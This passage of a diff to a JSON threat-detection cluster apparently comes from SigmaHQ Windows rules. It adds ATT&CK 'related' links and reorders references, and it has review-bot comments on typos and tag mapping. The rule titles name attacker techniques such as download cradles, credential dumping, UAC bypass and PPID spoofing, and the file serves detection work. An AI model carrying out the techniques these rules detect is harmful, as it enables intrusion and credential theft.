"tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "value": "Turla Group Commands May 2020" }, 
@@ -43144,6 +55431,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", "value": "Net WebClient Casing Anomalies" }, @@ -43168,6 +55464,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "value": "Suspicious Rundll32 Activity Invoking Sys File" }, @@ -43209,8 +55514,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml" ], "tags": [ @@ -43218,6 +55523,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "value": "File Download Using ProtocolHandler.exe" }, 
@@ -43242,13 +55556,22 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "value": "Add User to Local Administrators" }, { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) viq CommandLine", "meta": { - "author": "James Pemberton / @4A616D6573", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "creation_date": "2019/10/24", "falsepositive": [ "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." @@ -43259,6 +55582,7 @@ "logsource.product": "windows", "refs": [ "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" ], @@ -43267,6 +55591,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "value": "Usage Of Web Request Commands And Cmdlets" }, 
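Review bot: The new description line in `@@ -43242,13 +55556,22 @@` ends with `viq CommandLine`, where `viq` is a typo for `via`. The surrounding refs point at the upstream Sigma rule `proc_creation_win_web_request_cmd_and_cmdlets.yml`, so the text is presumably copied from the rule's `description` and the correction should be made there, otherwise the next regeneration reintroduces it; the intended line is `"description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine",`. The same hunk also turns `author` into a comma-separated list of five names in one string, which is consistent with the other entries on this page but worth noting if a consumer expects a single author.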
@@ -43291,6 +55624,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "value": "Winrar Compressing Dump Files" }, @@ -43307,10 +55649,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", + "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" ], "tags": [ @@ -43320,6 +55662,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", "value": "Emotet Process Creation" }, @@ -43337,8 +55688,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" ], 
@@ -43348,6 +55699,15 @@ "attack.t1087.002" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "value": "Suspicious Reconnaissance Activity Using Net" }, @@ -43374,6 +55734,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher" }, @@ -43424,6 +55793,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", "value": "WMI Spawning Windows PowerShell" }, @@ -43452,6 +55837,22 @@ "attack.t1114" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "25676e10-2121-446e-80a4-71ff8506af47", "value": "Exchange PowerShell Snap-Ins Usage" }, 
@@ -43477,6 +55878,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", "value": "UAC Bypass Using DismHost" }, @@ -43503,6 +55913,15 @@ "attack.s0040" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "value": "Htran or NATBypass Markers" }, @@ -43528,6 +55947,15 @@ "attack.t1529" ] }, + "related": [ + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "value": "Suspicious Execution of Shutdown to Log Out" }, @@ -43544,9 +55972,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ 
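Review bot: In the Htran hunk `@@ -43503,6 +55913,15 @@` the visible tag is `attack.s0040`, yet the only `related` entry is `731f4f55-b6d0-41d1-a7a9-072a66389aea`, the same dest-uuid the NPS hunk at `@@ -42945` pairs with `attack.t1090`; the software tag itself appears to produce no relation. The REvil hunk at `@@ -43939,6 +56471,15 @@` shows the same pattern for the group tag `attack.g0115`, whose single related entry `7385dfaf-...` is elsewhere paired with `attack.t1059`. If the generator intentionally maps only `attack.tNNNN` technique tags, that limitation should be stated in the galaxy description; if not, `attack.sNNNN` and `attack.gNNNN` tags are being dropped silently and could be mapped to the corresponding software and intrusion-set clusters. This is inferred from the tags visible in the hunks; the full tag lists start outside them.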
@@ -43554,6 +55982,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", "value": "Verclsid.exe Runs COM Object" }, @@ -43570,8 +56007,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", "https://ss64.com/nt/mklink.html", + "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_create_link_osk_cmd.yml" ], "tags": [ @@ -43607,6 +56044,29 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", "value": "Command Line Execution with Suspicious URL and AppData Strings" }, @@ -43664,6 +56124,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa4b21c9-0057-4493-b289-2556416ae4d7", "value": "Squirrel Lolbin" }, 
@@ -43681,9 +56150,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", - "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", + "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" ], "tags": [ @@ -43691,6 +56160,15 @@ "attack.t1204" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", "value": "DarkSide Ransomware Pattern" }, @@ -43760,6 +56238,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", "value": "Execute Pcwrun.EXE To Leverage Follina" }, @@ -43784,6 +56271,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "value": "Suspicious Use of CSharp Interactive Console" }, 
@@ -43800,8 +56296,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" ], "tags": [ @@ -43809,6 +56305,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", "value": "Netsh Port or Application Allowed" }, @@ -43834,6 +56339,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", "value": "Suspicious Rundll32 Script in CommandLine" }, @@ -43883,6 +56397,15 @@ "attack.t1552.006" ] }, + "related": [ + { + "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", "value": "Suspicious Recon Activity Using Findstr Keywords" }, 
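Review bot: The moved ref in `@@ -43800,8 +56296,8 @@` is `"https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)"`, a URL with a free-text suffix inside the same string, while every other `refs` entry on this page is a bare URL. A consumer that validates or dereferences refs will treat this entry as malformed. Either the annotation should be dropped, leaving `"https://attack.mitre.org/software/S0246/"`, or it should move into the rule's description; as the value presumably comes from the upstream Sigma rule `proc_creation_win_netsh_fw_add.yml`, fixing it there keeps the generated cluster clean.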
@@ -43900,9 +56423,9 @@ "logsource.product": "windows", "refs": [ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://github.com/antonioCoco/RogueWinRM", + "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ @@ -43910,6 +56433,15 @@ "attack.t1134.002" ] }, + "related": [ + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", "value": "Suspicious Child Process Created as System" }, @@ -43926,11 +56458,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", - "https://www.joesandbox.com/analysis/443736/0/html", "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://www.joesandbox.com/analysis/443736/0/html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" ], "tags": [ 
@@ -43939,6 +56471,15 @@ "attack.g0115" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", "value": "REvil Kaseya Incident Malware Patterns" }, @@ -43955,8 +56496,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" ], "tags": [ @@ -43989,6 +56530,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "value": "CobaltStrike Load by Rundll32" }, @@ -44039,7 +56589,7 @@ "value": "Network Sniffing" }, { - "description": "Detects a suspicious parents of powershell.exe", + "description": "Detects a suspicious parents of powershell.exe process", "meta": { "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "creation_date": "2020/03/20", @@ -44059,6 +56609,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", "value": "Suspicious PowerShell Parent Process" }, 
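Review bot: The changed description in `@@ -44039,7 +56589,7 @@` still has a number-agreement error: `Detects a suspicious parents of powershell.exe process`. The edit appended `process` but left `a ... parents`, and `process` is now attached to the wrong noun; `"description": "Detects suspicious parent processes of powershell.exe",` says what the rule title `Suspicious PowerShell Parent Process` implies. Since the text is presumably copied from the upstream Sigma rule, correcting it there avoids the typo returning on regeneration.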
@@ -44075,8 +56634,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" @@ -44086,6 +56645,15 @@ "attack.t1134.004" ] }, + "related": [ + { + "dest-uuid": "93591901-3172-4e94-abf8-6034ab26f44a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", "value": "PPID Spoofing Tool Usage" }, @@ -44102,9 +56670,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://twitter.com/splinter_code/status/1483815103279603714", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" ], 
@@ -44126,9 +56694,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" ], "tags": [ @@ -44161,6 +56729,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "129966c9-de17-4334-a123-8b58172e664d", "value": "Suspicious Dump64.exe Execution" }, @@ -44188,6 +56765,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", "value": "Suspicious Cmdl32 Execution" }, 
@@ -44204,8 +56797,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", + "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" ], @@ -44214,6 +56807,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", "value": "Suspicious Execution of Powershell with Base64" }, @@ -44238,6 +56840,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", "value": "Use of Anydesk Remote Access Software" }, @@ -44254,8 +56865,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" ], "tags": [ 
@@ -44263,6 +56874,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "value": "Suspicious Atbroker Execution" }, @@ -44289,6 +56909,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "value": "Invoke-Obfuscation Obfuscated IEX Invocation" }, @@ -44305,9 +56934,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/fireeye/DueDLLigence", - "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" ], "tags": [ @@ -44315,6 +56944,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", "value": "DLL Execution via Rasautou.exe" }, @@ -44339,6 +56977,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "value": "Hidden Powershell in Link File Pattern" }, 
@@ -44355,9 +57002,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/tevora-threat/SharpView/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" ], "tags": [ @@ -44369,6 +57016,29 @@ "attack.t1033" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "value": "Suspicious Execution of SharpView Aka PowerView" }, @@ -44420,6 +57090,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", "value": "Suspicious High IntegrityLevel Conhost Legacy Option" }, 
@@ -44471,6 +57150,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b66474aa-bd92-4333-a16c-298155b120df", "value": "Suspicious Powershell No File or Command" }, @@ -44497,6 +57192,15 @@ "attack.s0108" ] }, + "related": [ + { + "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "56321594-9087-49d9-bf10-524fe8479452", "value": "Suspicious Netsh DLL Persistence" }, @@ -44550,6 +57254,43 @@ "attack.t1003.006" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": 